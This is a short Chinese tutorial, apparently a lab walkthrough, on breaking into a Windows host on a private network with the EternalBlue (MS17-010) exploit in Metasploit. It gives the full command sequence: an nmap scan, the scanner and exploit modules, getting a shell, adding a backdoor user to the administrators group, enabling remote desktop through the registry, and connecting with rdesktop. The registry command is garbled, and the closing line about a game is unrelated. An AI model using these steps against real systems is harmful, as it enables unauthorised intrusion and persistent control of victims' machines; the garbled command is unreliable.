1.用 nmap 探测本网段内存活的主机
nmap 192.168.61.0/24
2、使用MSF的永恒之蓝漏洞模块
输入 msfconsole 打开MSF界面
命令:search ms17_010
配合使用,前者先扫描,若显示有漏洞,再进行下一步攻击。
3、使用ms17-010扫描模块,对受害者进行扫描:
模块使用:
use auxiliary/scanner/smb/smb_ms17_010
设置目标IP或网段:
set rhosts 192.168.61.128
执行扫描:run
如出现漏洞(注:这里就不展示了)
4、使用ms17-010攻击模块,对受害者进行攻击
使用模块:
use exploit/windows/smb/ms17_010_eternalblue
设置攻击目标IP:
set rhosts 192.168.61.128
可以使用 show options 命令查看设置选项
执行攻击: run
5、得到受害者 shell
乱码可以输入: chcp 65001
6、通过shell对受害者进行控制
1.输入:net user sss 123456 /add
语法:net user 用户名 密码 /add
查看用户信息,命令:net user
2.将用户添加为管理员组
命令:net localgroup administrators sss /add
3、开启远程桌面功能
查看3389端口状态:netstat -ano
看到3389端口并没有开启,开启3389端口,命令:
REG ADD HKLMSYSTEMCurrentControlSetControlTerminal” “Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
4、远程桌面连接受害者
rdesktop 192.168.61.128:3389
游戏也是很好玩的